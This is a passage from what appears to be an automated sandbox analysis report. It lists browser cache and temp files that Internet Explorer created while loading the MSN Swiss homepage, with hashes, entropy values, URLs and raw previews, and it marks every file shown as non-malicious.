.[.A.J...4.T>$.Y..g.lt...B..X.B.....<{...<Qa.bP.....LC..-.......:....(...#..,3....\|Kt

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB14Ue5t[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	downloaded
Size (bytes):	41079
Entropy (8bit):	7.937824760197294
Encrypted:	false
SSDEEP:	768:IWcgQQIk+bQ4vmRpZTa3EKVKHigA42wpmKgpk6bEN:IWcgGbQ4eRpg02wpgaTN
MD5:	428883A7515755A9F47B897F01585C05
SHA1:	7A4630747C5884C5A27F71462B9B035EB59792C2
SHA-256:	F1C207C5BC4E8FAE1F42E1B18296D13C0F86AA0B0A7C15824481198EE14EA1F0
SHA-512:	FB74773D977EDB96FD60EDCBF641E2633E9D371E503FA224A80B06500430B34E9B06B5069F9C98B5C506D44C2125D1D4F5092B9ACCF4C52BD8A32C6E5AC69732
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB14Ue5t.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(......(....>........_..."...h.. ....(.....@..%.-.!...@..;..E.QHb...r4PoP...}3I..+".S.j....Uq..\.......eFj.K.....&Dm....W.aZ.V......l..~.hR.X...OS..;...Ll.\pj..26F..b.hM...h..\.:U&.qLC...J..q....`..1T.P+.(.A.....6..5@'....L..h.......9..i......W..S...b..@.@.(...........-rbz..:.]r.....P.@....P.@....P.@....P..:7..,?../..S.v...(.h.i.P.h.3L......(......!.y.p.. .....z.$.....~.8...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB1ardZ3[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	516
Entropy (8bit):	7.407318146940962
Encrypted:	false
SSDEEP:	12:6v/7Sl9NtxleH8MQvz3DijcJavKhiOs4kxWylL9yc:NbrUcMUkcJavKhpuWkLB
MD5:	641BF007DD9C5219123159E0DFC004D0
SHA1:	786F6610D6F9307933CAE53C482EB4CA0E769EC1
SHA-256:	47E121B5B301E8B3F7D0C9EADCF3D4D2135072F99F141C856B47696FC71E86EF
SHA-512:	9D22B1364A399627F1688D39986DF8CEB2C4437D7FF630B0FA17B915C6811039D3D9A8F18BEC1A4A2F6BA6936866BB51303369BFE835502FBA2A115FF45A122B
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1ardZ3.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx..R.o.Q.=A.A...b4....v....%%1I.&..B._.&..s?&.n.P$......`j...}...v..7.....w.}?.'........G..j....h4.P..........quy.r...T..-...:.=...+..vL.S.5.Lp.J.^..V.p8.}>..m<..x.....$..N'..0Z.....P,..l.Xp.....\|>.:..non..p...^_.H$..N. ..c0..\|\|r..V..F...D".f.I5R.....vQ.T.....XL9.`C....r.N.!....P(..^...h.n...f3...W...c5..D..lF..$88<D...d2x.......l6.G.x<..J?..F.Q.H$B4.C0..x<...o.q..P.F..d2..J%>..!.[....r9...<[N..E.T..RP..a.K...+......'g......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB1cG73h[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	1131
Entropy (8bit):	7.767634475904567
Encrypted:	false
SSDEEP:	24:lGH0pUewXx5mbpLxMkes8rZDN+HFlCwUntvB:JCY9xr4rZDEFC
MD5:	D1495662336B0F1575134D32AF5D670A
SHA1:	EF841C80BB68056D4EF872C3815B33F147CA31A8
SHA-256:	8AD6ADB61B38AFF497F2EEB25D22DB30F25DE67D97A61DC6B050BB40A09ACD76
SHA-512:	964EE15CDC096A75B03F04E532F3AA5DCBCB622DE5E4B7E765FB4DE58FF93F12C1B49A647DA945B38A647233256F90FB71E699F65EE289C8B5857A73A7E6AAC6
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................U....pHYs..........+......IDATx..U=l.E.~3;w{..#].Dg!.SD...p...E....PEJ.......B4.RE. :h..B.0.-$.D"Q 8.(.;.r.{3...d...G......7o..9....vQ.+...Q......."!#I......x\|...\...& .T6..~......Mr.d.....K..&..}.m.c.....`.`....AAA..,.F.?.v..Zk;...G...r7!..z......^K...z.........y...._..E..S....!$...0...u.-.Yp...@;;;%BQa.j..A.<)..k..N.....9.?..]t.Y.`....o....[.~~..u.sX.L..tN..m1...u...........Ic....,7..(..&...t.Ka.]..,.T..g.."...W......q....:+t.?6....A..}...3h.BM/.......<.~..A.`m...:.....H...7.....{.....$... AL..^-...?5FA7'q..8jue........?A...v..0...aS.:.0.%.%"......[.=a......X..j..<725.C..@.\. ..`.._....'...=....+.Sz.{......JK.A...C\|{.\|r.$.=Y.#5.K6.!........d.G...{......$.-D.z..{...@.!d.e...&..o...$Y...v.1.....w..(U...iyWg.$...\>..].N...L.n=.[.....QeVe..&h...`;=.w.e9..}a=.......(.A&..#.jM~4.1.sH.%...h...Z2".........RP....&.3................a..&.I...y.m...XJK..'...a......!.d.......Tf.yLo8.+.+...KcZ.....\|K..T....vd....cH.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB1gqGZR[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	downloaded
Size (bytes):	22551
Entropy (8bit):	7.794325463423114
Encrypted:	false
SSDEEP:	384:IPCnZaWTB83t5MynOQ2rZYVUktoXuFmr8s9aERDy4VDAWnRpH32kav:I2ZaWVT9YVU7eF09guy4dLRpHG1v
MD5:	5DAEBFAAAC4797244D9AD6F9F87B8C50
SHA1:	DFDD95E7DC45DA231DD4F14FEE7BDB0D01439B14
SHA-256:	060BCBAFF51498CCC985066A6114EDF79AE21996F04F9BCA22E279574EB0A5E9
SHA-512:	FA227A2802A3E7E7EF1902087F65F3935CD640263D1F3223C882EBA8A8F3E3AED3450031D42EEE564A21D2520529C1603DF42D7A5288D70034BC0176A3F023EC
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1gqGZR.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..I. a4..@.@.-....>..+...'j.ct......:..P.zP.P.M.1.....h.....P..J.....J.$P".j(.`........Hb.p..n..#.L..`Q.6.P.O.....(...%....L..:...P.@....p.......P.zP.P.M.3..(.@.h...........F.@...Hb.J....-.{.....Z.(.....c...iN+...:bH./...a...d.\..#......`K;....v..kk..{..C.sK..u.....3fl.mS.q(...$37.^....Q:1...b..AC..6..@.m....}..WZ....0..GZ.p...@.....P...0..M.4..@. .`P.;.....)."..@..QL.\|..H.4.Z

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BBJrII1[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	285
Entropy (8bit):	6.817753121237528
Encrypted:	false
SSDEEP:	6:6v/lhPahmCsuNR/8GxYbIi9BfLlNN0lgpmPuoEGXn1S/NmredEGWcqp:6v/7wz0Gx2v8lgpmn1GDdgp
MD5:	815BC0B491D1C2229AA6AF07F213CAB5
SHA1:	E7F9F38CE6E310209CEC1F291D398AA499CFB64D
SHA-256:	2705097C373E4DE9A34E02C575A3D86854FCDD08365DA79F93525E68F562917A
SHA-512:	3B87F4003BE22584D59B301C89FE5B09E16B27126E3A8E90C4DCFD8AB94052A17AEFE7D75443151A48757031033A92077BA603BE01E1A199BC8727B8E0593DC9
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBJrII1.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx...-..`....].,.b.4h.*~....h2.,v?.`2..2.f.f....2."8A..I..O..;.q....c..<..@)......y..t...-r....{...u.}$....0qF.3..F.]..8C.!....K..FL0.4...29.....2..c..4(.D....S.PE.=,...,,..s._P.)....C../....e.O.7P...f3.!......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BBY7ARN[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	779
Entropy (8bit):	7.670456272038463
Encrypted:	false
SSDEEP:	24:dYsfeTaIfpVFdpxXMyN2fFIKdko2boYfm:Jf5ILpCyN29lC5boD
MD5:	30801A14BDC1842F543DA129067EA9D8
SHA1:	1900A9E6E1FA79FE3DF5EC8B77A6A24BD9F5FD7F
SHA-256:	70BB586490198437FFE06C1F44700A2171290B4D2F2F5B6F3E5037EAEBC968A4
SHA-512:	8B146404DE0C8E08796C4A6C46DF8315F7335BC896AF11EE30ABFB080E564ED354D0B70AEDE7AF793A2684A319197A472F05A44E2B5C892F117B40F3AF938617
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBY7ARN.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx.eSMHTQ...7.o.8#3.0....M.BPJDi...E..h.A...6..0.Z$..i.A...B....H0.rl..F.y:?...9O..^......=.J..h..M]f>.I...d...V.D..@....T..5`......@..PK.t6....#,.....o&.U.lJ @...4S.J$..&......%v.B.w.Fc......'B...7...B..0..#z..J..>r.F.Ch..(.U&.\..O.s+..,]Z..w..s.>.I_.......U$D..CP.<....].\w..4..~...Q....._...h...L......X.{i... {..&.w.:.....$.W.....W..."..S.pu..').=2.C#X..D.........}.$..H.F}.f...8...s..:.....2..S.LL..'&.g.....j.#....oH..EhG'...`.p..Ei...D...T.fP.m3.CwD).q.........x....?..+..2....wPyW...j........$..1........!Wu*e"..Q.N#.q..kg...%`w.-.o..z..CO.k.....&..g..@{..k.J._...)X..4)x...ra.#....i._1...f..j...2..&.J.^. .@$.`0N.t.......D.....iL...d/.\|Or.L._...;a..Y.]i.._J....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BBih5H[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	835
Entropy (8bit):	7.675892111492914
Encrypted:	false
SSDEEP:	12:6v/7eorYebkI7N8EWhref+IdamL6pZvzKOH3X+tLNUAV6W9ONhTKnLw2x2lZgmAu:iYekvatqlKOXXS9V6W9uzRcQ9bL
MD5:	F79F56222F8B1B951A00A306C8AFA5C4
SHA1:	9FE78220A6811338E68FE7A2D65DC3B7FB5302BD
SHA-256:	2EF60D23400424838CD3B53021CFD903AA330168BDCC0A2AACFC7185832C00A9
SHA-512:	2172E9FCAB0547423F941BDB338D25528081F454857CA20A2D984C246CBF403341AC3689A748CECC1401B125E2138CFB61A9BF95F05D70329FB0BF504AFF9028
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u=true&n=true&w=30&h=30
Preview:	.PNG........IHDR.............;0......pHYs..........+......IDATx..MHTQ....,...#..i....-.. J.6...iQd...p........D.6.e...>6AE.FJa.IA.b5ji..;>....\|..-<.s.}......&90I6%..6........o.-!'..!...Z<+^D...7..q:............Gx..5........&...6.{.4NBh.._Av....<..;`=<..D..5.[.g.4..Y+\|.......X...M....=..4.0.4....6.......x.....3......e0b.....k.Fa..@-.....=...c\|.8....4?../.o.g@=....ho.&...3$6.V....Ds .f.T..-...G\.7.z....h.&..^....bE...c...].0..!.Y.i.EU9t.$L...%ra.....I........L.l..uUyO. .%..F..s...kmW#~....2v.L~...N{3...i.U........E.g}.l...b]..%g.^7r.9.t...)...N.....a.4.....^'......-.f.A-..(LV..:} .~.O@.....g......\|`....".#..I.......@...u.>.{xD\|....`:.0.U...v9.u......c2C4)..,.u.a5....d.i....q....4.9.-.ip...C..:..g..h.N.B..+.U.w.......a.g...[.G.8.xZ<....:2nw:3ne,\|.oa...G.J1...c.&.N.Ox..6.............IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\a5ea21[1].ico Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	758
Entropy (8bit):	7.432323547387593
Encrypted:	false
SSDEEP:	12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
MD5:	84CC977D0EB148166481B01D8418E375
SHA1:	00E2461BCD67D7BA511DB230415000AEFBD30D2D
SHA-256:	BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
SHA-512:	F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Preview:	.PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D..M..............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q\|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq\|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\auction[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	12499
Entropy (8bit):	5.813104458960433
Encrypted:	false
SSDEEP:	384:cSYFLPQkxORi2uUYpG3kLaVuUkpnVwSAhIuUypYK6RP:2FbHO7k2hSASRF
MD5:	6CFE31A1306D7556755B7DE10276FE9A
SHA1:	493A721B9BD026CFB18BE5ED1A76F7FEC944889F
SHA-256:	1D7D04A5D35CC69449B2D204AEE601AAF13567ADD689094F84FD5D6EDE85C399
SHA-512:	596BD2E756BDD719E0B193E064D4F555B3F0965C36770F644ADA42E86191DF77BAD26CBC86BA3DB998F118E4D816F87E66D35EF8C6CB32781399B149AD2A429B
Malicious:	false
IE Cache URL:	https://srtb.msn.com/auction?a=de-ch&b=9ecc1772ef804391b1937a727e8fcb51&c=MSN&d=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&e=HP&f=0&g=homepage&h=&j=0&k=0&l=&m=0&n=infopane%7C3%2C11%2C15&o=&p=init&q=&r=&s=1&t=&u=0&v=0&x=&w=&_=1622746726638
Preview:	..<script id="sam-metadata" type="text/html" data-json="{"optout":{"msaOptOut":false,"browserOptOut":false},"taboola":{"sessionId":"v2_37f2aca9dba2a355a74ad6e56107ac4d_091256a2-c556-45bc-8a47-60f1e44a149a-tuct7b2abfc_1622746748_1622746748_CIi3jgYQr4c_GJr66I7Bq63EkwEgASgBMCs4stANQNCIEEje2NkDUP___________wFYAGAAaKKcqr2pwqnJjgE"},"tbsessionid":"v2_37f2aca9dba2a355a74ad6e56107ac4d_091256a2-c556-45bc-8a47-60f1e44a149a-tuct7b2abfc_1622746748_1622746748_CIi3jgYQr4c_GJr66I7Bq63EkwEgASgBMCs4stANQNCIEEje2NkDUP___________wFYAGAAaKKcqr2pwqnJjgE","pageViewId":"9ecc1772ef804391b1937a727e8fcb51","RequestLevelBeaconUrls":[]}">..</script>....<li class="single serversidenativead hasimage " data-json="{"tvb":[],"trb":[],"tjb":[],"p":"gemini","e":true}" data-provider="gemini" data-ad-region="infopane" data-ad-index="3" data-viewability="{

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\de-ch[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	428203
Entropy (8bit):	5.446070112097293
Encrypted:	false
SSDEEP:	3072:rJ5JUexx+1Pkf8bt0OHhHMnQHGtPHe88MYRIDXbrYS8g6TVUAL1teCceJxLf:rJ5pO1UBfevRoYSBSUSteCVJh
MD5:	A2446F8692C9AB0562F43B0F7C724302
SHA1:	FF4A34916637B6EDF087C54DC2C1F8B27488B02F
SHA-256:	7E8C8F42C5E933B31686732E1DAA3DCCF421C7718D7C78B1C259DC5671FAB4C3
SHA-512:	AF84B62B8F9D5F8C69B38E9A3DB46F21A6F59DD6B8D93AD5120371740A97DBEFAC7786C6F31F0D906F394D7EE7B4DA9CFD2EB0DB726728C7FA05FFD0899FE5F8
Malicious:	false
Preview:	<!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20210601_21448660;a:9ecc1772-ef80-4391-b193-7a727e8fcb51;cn:8;az:{did:951b20c4cd6d42d29795c846b4755d88, rid: 8, sn: neurope-prod-hp, dt: 2021-05-21T01:23:01.4107192Z, bt: 2021-06-01T00:12:19.8247979Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2021-06-01 08:04:58Z;xdmap:2021-06-03 18:57:59Z;axd:;f:msnallexpusers,muidflt14cf,muidflt56cf,muidflt58cf,muidflt260cf,muidflt300cf,muidflt315cf,pnehp1cf,starthp1cf,starthp3cf,platagyhp2cf,moneyhz1cf,moneyhz3cf,onetrustpoplive,msnapp3cf,1s-bing-news,vebudumu04302020,bbh20200521msncf,shophp1cf,msnsapphire1cf,1s-winblisp1,prg-adspeek;userOptOut:false;userOptOutOptions:" data-js="{"dpi":1.0,"ddpi":1.0,"dpio":null,"forcedpi":null,"dms"

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\e151e5[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 1 x 1
Category:	downloaded
Size (bytes):	43
Entropy (8bit):	3.122191481864228
Encrypted:	false
SSDEEP:	3:CUTxls/1h/:7lU/
MD5:	F8614595FBA50D96389708A4135776E4
SHA1:	D456164972B508172CEE9D1CC06D1EA35CA15C21
SHA-256:	7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
SHA-512:	299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Preview:	GIF89a.............!.......,...........D..;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\log[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 1 x 1
Category:	dropped
Size (bytes):	35
Entropy (8bit):	3.081640248790488
Encrypted:	false
SSDEEP:	3:CUnl/RCXknEn:/wknEn
MD5:	349909CE1E0BC971D452284590236B09
SHA1:	ADFC01F8A9DE68B9B27E6F98A68737C162167066
SHA-256:	796C46EC10BC9105545F6F90D51593921B69956BD9087EB72BEE83F40AD86F90
SHA-512:	18115C1109E5F6B67954A5FF697E33C57F749EF877D51AA01A669A218B73B479CFE4A4942E65E3A9C3E28AE6D8A467D07D137D47ECE072881001CA5F5736B9CC
Malicious:	false
Preview:	GIF89a.............,........@..L..;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\otFlat[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	12282
Entropy (8bit):	5.246783630735545
Encrypted:	false
SSDEEP:	192:SZ1Nfybp4gtNs5FYdGDaRBYw6Q3OEB+q5OdjM/w4lYLp5bMqEb5PenUpoQuQJYQj:WNejbnNP85csXfn/BoH6iAHyPtJJAk
MD5:	A7049025D23AEC458F406F190D31D68C
SHA1:	450BC57E9C44FB45AD7DC826EB523E85B9E05944
SHA-256:	101077328E77440ADEE7E27FC9A0A78DEB3EA880426DFFFDA70237CE413388A5
SHA-512:	EFBEFAF0D02828F7DBD070317BFDF442CAE516011D596319AE0AF90FC4C4BD9FF945AB6E6E0FF9C737D54E05855414386492D95ABFC610E7DE2E99725CB1A906
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/otFlat.json
Preview:	.. {.. "name": "otFlat",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtYmFubmVyLXNkayIgY2xhc3M9Im90RmxhdCIgcm9sZT0iZGlhbG9nIiBhcmlhLWRlc2NyaWJlZGJ5PSJvbmV0cnVzdC1wb2xpY3ktdGV4dCI+PGRpdiBjbGFzcz0ib3Qtc2RrLWNvbnRhaW5lciI+PGRpdiBjbGFzcz0ib3Qtc2RrLXJvdyI+PGRpdiBpZD0ib25ldHJ1c3QtZ3JvdXAtY29udGFpbmVyIiBjbGFzcz0ib3Qtc2RrLWVpZ2h0IG90LXNkay1jb2x1bW5zIj48ZGl2IGNsYXNzPSJiYW5uZXJfbG9nbyI+PC9kaXY+PGRpdiBpZD0ib25ldHJ1c3QtcG9saWN5Ij48aDMgaWQ9Im9uZXRydXN0LXBvbGljeS10aXRsZSI+VGl0bGU8L2gzPjxwIGlkPSJvbmV0cnVzdC1wb2xpY3ktdGV4dCI+dGl0bGU8L3A+PGRpdiBjbGFzcz0ib3QtZHBkLWNvbnRhaW5lciI+PGgzIGNsYXNzPSJvdC1kcGQtdGl0bGUiPldlIGNvbGxlY3QgZGF0YSBpbiBvcmRlciB0byBwcm92aWRlOjwvaDM+PGRpdiBjbGFzcz0ib3QtZHBkLWNvbnRlbnQiPjxwIGNsYXNzPSJvdC1kcGQtZGVzYyI+ZGVzY3JpcHRpb248L3A+PC9kaXY+PC9kaXY+PC9kaXY+PC9kaXY+PGRpdiBpZD0ib25ldHJ1c3QtYnV0dG9uLWdyb3VwLXBhcmVudCIgY2xhc3M9Im90LXNkay10aHJlZSBvdC1zZGstY29sdW1ucyI+PGRpdiBpZD0ib25ldHJ1c3QtYnV0dG9uLWdyb3VwIj48YnV0dG9uIGlkPSJvbmV0cnVzdC1wYy1idG4taGFuZGxlciI+Y2h

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\otPcCenter[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	47714
Entropy (8bit):	5.565687858735718
Encrypted:	false
SSDEEP:	768:4zg/3JXE9ZSqN76pW1lzZzic18+JHoQthI:4zCBceUdZzic18+5xI
MD5:	8EC5B25A65A667DB4AC3872793B7ACD2
SHA1:	6B67117F21B0EF4B08FE81EF482B888396BBB805
SHA-256:	F6744A2452B9B3C019786704163C9E6B3C04F3677A7251751AEFD4E6A556B988
SHA-512:	1EDC5702B55E20F5257B23BCFCC5728C4FD0DEB194D4AADA577EE0A6254F3A99B6D1AEDAAAC7064841BDE5EE8164578CC98F63B188C1A284E81594BCC0F20868
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/v2/otPcCenter.json
Preview:	.. {.. "name": "otPcCenter",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtcGMtc2RrIiBjbGFzcz0ib3RQY0NlbnRlciBvdC1oaWRlIG90LWZhZGUtaW4iIGFyaWEtbW9kYWw9InRydWUiIHJvbGU9ImRpYWxvZyIgYXJpYS1sYWJlbGxlZGJ5PSJvdC1wYy10aXRsZSI+PCEtLSBDbG9zZSBCdXR0b24gLS0+PGRpdiBjbGFzcz0ib3QtcGMtaGVhZGVyIj48IS0tIExvZ28gVGFnIC0tPjxkaXYgY2xhc3M9Im90LXBjLWxvZ28iIHJvbGU9ImltZyIgYXJpYS1sYWJlbD0iQ29tcGFueSBMb2dvIj48L2Rpdj48YnV0dG9uIGlkPSJjbG9zZS1wYy1idG4taGFuZGxlciIgY2xhc3M9Im90LWNsb3NlLWljb24iIGFyaWEtbGFiZWw9IkNsb3NlIj48L2J1dHRvbj48L2Rpdj48IS0tIENsb3NlIEJ1dHRvbiAtLT48ZGl2IGlkPSJvdC1wYy1jb250ZW50IiBjbGFzcz0ib3QtcGMtc2Nyb2xsYmFyIj48aDMgaWQ9Im90LXBjLXRpdGxlIj5Zb3VyIFByaXZhY3k8L2gzPjxkaXYgaWQ9Im90LXBjLWRlc2MiPjwvZGl2PjxidXR0b24gaWQ9ImFjY2VwdC1yZWNvbW1lbmRlZC1idG4taGFuZGxlciI+QWxsb3cgYWxsPC9idXR0b24+PHNlY3Rpb24gY2xhc3M9Im90LXNkay1yb3cgb3QtY2F0LWdycCI+PGgzIGlkPSJvdC1jYXRlZ29yeS10aXRsZSI+TWFuYWdlIENvb2tpZSBQcmVmZXJlbmNlczwvaDM+PGRpdiBjbGFzcz0ib3QtcGxpLWhkciI+PHNwYW4gY2xhc3M9Im90LWxpLXRpdGxlIj5Db25zZW50PC9

C:\Users\user\AppData\Local\Temp\~DF007899116C0F9B52.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40177
Entropy (8bit):	0.6743355224532855
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+eYSbIdHeCTxY9mHeCTxY9VHeCTxY9m:kBqoxKAuqR+eYSbIdFCmFCVFCm
MD5:	A1D013DC6F6C6876126EFB98968BE868
SHA1:	1F350DA5A2845AD7272940860F14FA805CDE7163
SHA-256:	5295CD7AA0329938ED42DEFD0E444214702BD5C95100E9FA2F10376B83B58883
SHA-512:	B3D74A0EAB03D1B5FE5F9832D9634FF527C88E319911F7E469FA2B44184F962480C0DBC704949C975B8DAC66DDE5178FF18298F4EF9530F9B841DDC938DEE987
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF0C5126AEADFE7CF3.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	19061
Entropy (8bit):	2.5473985872706604
Encrypted:	false
SSDEEP:	48:kBqoItrs8G6r2uPLKl0MUk2yctF+B2Z3MiQNM+EMbNGSn03XwMSM5KfMweuFyM9s:kBqoItrSbClAcn+4KdouK
MD5:	A64E8BF80A546A66C9C2E416E8D638C3
SHA1:	2DB6904A3431B775986FAB3121A47BD921749967
SHA-256:	5458E15A0B0BCE1579DB0264EE19992C0BFFF5A9E755F877D6FD655BCA665384
